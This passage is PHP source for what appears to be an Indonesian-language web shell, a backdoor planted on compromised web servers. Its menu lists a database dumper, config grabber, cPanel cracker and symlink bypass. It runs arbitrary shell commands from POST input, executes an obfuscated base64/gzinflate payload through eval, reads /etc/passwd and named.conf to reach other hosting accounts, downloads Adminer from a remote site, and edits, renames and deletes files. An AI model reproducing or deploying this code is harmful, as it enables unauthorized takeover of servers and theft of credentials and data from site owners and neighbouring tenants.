";
echo "[ Home ]";
echo "[ DB Dumper ]";
echo "[ Config Grabber ]";
echo "[ Cpanel Crack ]";
echo "[ Jumping ]";
echo "[ Symlink ]";
echo "[ Bypass Symlink 404 ]";
echo "[ Adminer ]";
echo "[ Logout ] ";
echo "PHP Execution Command
";
chdir($path);
if(isset($_POST['cok'])) {
$cok = shell_exec($_POST['cok']);
}
echo '';
if($_GET['logout'] == true) {
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
echo "";
} elseif($_GET['it'] == 'sym_404') {
echo '
';
if($_POST['bypass']) {
mkdir("sym404", 0777);
$dir = $_POST['dir'];
$save = $_POST['save'];
shell_exec("ln -s".$dir." sym404/".$save);
symlink($dir,"sym404/".$save);
$fopsym = fopen("sym404/.htaccess","w");
fwrite($fopsym,"ReadmeName ".$save);
fclose($fopsym);
echo 'Touch !!!';
}
} elseif($_GET['it'] == 'sym') {
echo ' ';
eval(gzinflate(base64_decode('7Vf/T9tGFP89Uv6Hx5HJ9kjtJKhrReKUrjCt0lakQrdJUEWOfcYeF591d8GklP997852SOME1C/SNqlIRM777vfl81468Zwx8EEqMRE0Z0FI7c7k9PjtH8dvz62jk1fvfj9+czZ5e3JyZr3vAiFd6OSBSpxhu9WJerMgzSSqH8YpozbxqAq9LJjRyA15FhMttbubKIVmZbuVxnat49y2W4ezqygVNpGLbCIXM9LtPXv2TKschsknDEOjNzS0CcvgiQQPBOfK0Dva8z6GYJ3kKuUYzessQlkJv3DGeHG6mP2WZlfo/SgVNFRcLIwAoHE3UbN262UUnS1yCoreKA8zkGbg5kkOhvNrkEWMinVmu3UaqFTGC3iZLSwTRq6DiHlOM9tCw0GIryytrlVYZZiF4RciVZhhlO6WkTvDwzhkXJZELUrDhANpt0YqmDIKAUsvMz+kmcIwplxEVPj7WK8Fo75VpJFKDn7q/TAsOU9Czrg42H3+cw//htZYmxHmM/rE0ngU80yBEfdZOqMg0w/UH4xPXXjD3ZGn2eORp6LPUT7iprhfqP1OUvGlulhmhmVe0/bw3Ynp1JDPUc+HPn6LuaBBmCx7EQIJ1bNuS+xSKuhlapMPPKOkW7Oc2xzJk1mgwmQSMGZbu1oAiO3+6JBdq1sb0Q9lInQ5YzaXia2f0DCOGcMGUSKd2bXQef/9ee+948AYBtp/Z455wFBzLtObySVVeTFPI9uMGC8yKqo5u8bEBJJKj7jrppZdhMVfyx8mpsxhlTgCLtTpcVFhS/oZjZEaQCJo7ONA5weeVxSFu+7bJV5dIxZI6asbNW7KLL0EK560nH71c0sjiGXElrzatdXRgOVVyOBpGPASPqNeQ9nL51OWhhOccWaBCgRm0rcmUxZkV1YjxvX+qQKrOghWy1hla29veHd3t0y0Z6bVdNsdZZLqQp4dn575JTRapmQ5uisiq2wGsI3AZyPhfxsI4TEkhAegELnraAg1HMIDeNgflygHW/DC9Pr+Rmx7RGUDJj3mpIlESxyCT4EIzHsvk0VWegT3LBHEAS6A3qTKJu8y8/aKg5YFrbhj6g5FohtsJ6Yc16umO7qloKP3coxNLyuqcWjQi2pWIESwsEuqDuge3LBZLzwEtRfOxcGF50mNbLK71F03tHo6kHIWu3gn1BI480bjHv2WhhDx+gP4+BEaDN+Hnmbcu/GBTNOMNIg6ZX/1+14sm7zrQHgsnXrZNmYg8kKTNnMveZ5Q0eTJjYEYe9GsyZhLNIWgtCWGWOWb3yrbxNAaiLubGebyIg4mG68vlWZzej9AekAeatwNm+DBbl+Bd61Xh1IrklXPjxiosX0rtK85WEX2BrAvxy/YMnsat5cYU8/FOoiXEK7vVS5hB9P7Z5pFvJDEud2C1U2k1hdrA6fvURq9fiZQ93rPvwFIt1tfDdMPYHRd4mRQFdi6GjC2vx8NlqWBUyquqRh5yWD8TWD99dG/CumKznJMFCHDDp5kfXzsmaeBRnl9haMQnpx2xR75YLjl1709B247eN/pH1FrF58RqLATjwUkOaUz14e/eYplO7C6huySiwybtq6ENZoKb2wN69DKc1N/qRrwKRJNVGbtKCqVi4OIsF2UKyXO5/XaeNqtFDV5ZWyeoqmVZVZvsk1Wv2qTNdfYt9lh3xfY9wX2/11ga8O4YYeNvCi9xs8qZDKcZ9rsylwapTvQmw7u1Tfh36sgyzi+MP5sVhTW0XDpQZsr/1+M/wE=')));
} elseif($_GET['it'] == 'admnr') {
echo " ";
$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
function adminer($url, $isi) {
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
if(file_exists('adminer.php')) {
echo "-> adminer login <-";
} else {
if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
echo "-> adminer login <-";
} else {
echo "gagal buat file adminer";
}
}
} elseif($_GET['it'] == 'jmp') {
echo " ";
$i = 0;
echo "";
if(preg_match("/hsphere/", $path)) {
$urls = explode("\r\n", $_POST['url']);
if(isset($_POST['jump'])) {
echo " ";
foreach($urls as $url) {
$url = str_replace(array("http://","www."), "", strtolower($url));
$etc = "/etc/passwd";
$f = fopen($etc,"r");
while($gets = fgets($f)) {
$pecah = explode(":", $gets);
$user = $pecah[0];
$dir_user = "/hsphere/local/home/$user";
if(is_dir($dir_user) === true) {
$url_user = $dir_user."/".$url;
if(is_readable($url_user)) {
$i++;
$jrw = "[R] $url_user";
if(is_writable($url_user)) {
$jrw = "[RW] $url_user";
}
echo $jrw." ";
}
}
}
}
if($i == 0) {
} else {
echo " Total ada ".$i." Kamar di ".$ip;
}
echo " ";
} else {
echo '
';
}
} elseif(preg_match("/vhosts/", $path)) {
$urls = explode("\r\n", $_POST['url']);
if(isset($_POST['jump'])) {
echo " ";
foreach($urls as $url) {
$web_vh = "/var/www/vhosts/$url/httpdocs";
if(is_dir($web_vh) === true) {
if(is_readable($web_vh)) {
$i++;
$jrw = "[R] $web_vh";
if(is_writable($web_vh)) {
$jrw = "[RW] $web_vh";
}
echo $jrw." ";
}
}
}
if($i == 0) {
} else {
echo " Total ada ".$i." Kamar di ".$ip;
}
echo " ";
} else {
echo '
';
}
} else {
echo " ";
$etc = fopen("/etc/passwd", "r") or die("Can't read /etc/passwd");
while($passwd = fgets($etc)) {
if($passwd == '' || !$etc) {
echo "Can't read /etc/passwd";
} else {
preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
foreach($user_jumping[1] as $user_idx_jump) {
$user_jumping_dir = "/home/$user_idx_jump/public_html";
if(is_readable($user_jumping_dir)) {
$i++;
$jrw = "[R] $user_jumping_dir";
if(is_writable($user_jumping_dir)) {
$jrw = "[RW] $user_jumping_dir";
}
echo $jrw;
if(function_exists('posix_getpwuid')) {
$domain_jump = file_get_contents("/etc/named.conf");
if($domain_jump == '') {
echo " => ( gabisa ambil nama domain nya ) ";
} else {
preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
foreach($domains_jump[1] as $dj) {
$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_jumping_url = $user_jumping_url['name'];
if($user_jumping_url == $user_idx_jump) {
echo " => ( $dj ) ";
break;
}
}
}
} else {
echo " ";
}
}
}
}
}
if($i == 0) {
} else {
echo " Total ada ".$i." Kamar di ".$ip;
}
echo " ";
}
echo " ";
} elseif(isset($_GET['dbdump'])) {
echo '
';
echo '
";
} else {
$act = "permission denied";
}
}
echo $act;
echo "";
} elseif($_GET['iac'] == 'newfolder') {
echo " ";
if($_POST['new_save_folder']) {
$new_folder = $path.'/'.htmlspecialchars($_POST['newfolder']);
if(!mkdir($new_folder)) {
$act = "permission denied";
} else {
$act = "";
}
}
echo $act;
echo "";
}
if(isset($_GET['filesrc'])){
echo " | Current File : ";
echo $_GET['filesrc'];
echo ' |
';
echo(''.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '
'.$_POST['path'].'
';
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo 'Change Permission Berhasil
';
}else{
echo 'Change Permission Gagal
';
}
}
echo '';
}elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo 'Ganti Nama Berhasil
';
}else{
echo 'Ganti Nama Gagal
';
}
$_POST['name'] = $_POST['newname'];
}
echo '';
}elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo 'Berhasil Edit File
';
}else{
echo 'Gagal Edit File
';
}
fclose($fp);
}
echo '';
}
echo '';
}else{
echo '
';
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo 'Directory Terhapus
';
}else{
echo 'Directory Gagal Terhapus
';
}
}elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo 'File Terhapus
';
}else{
echo 'File Gagal Dihapus
';
}
}
}
echo '';
$scandir = scandir($path);
echo '';
}
echo "
Blog Copyright FALKA - 2018 follow IG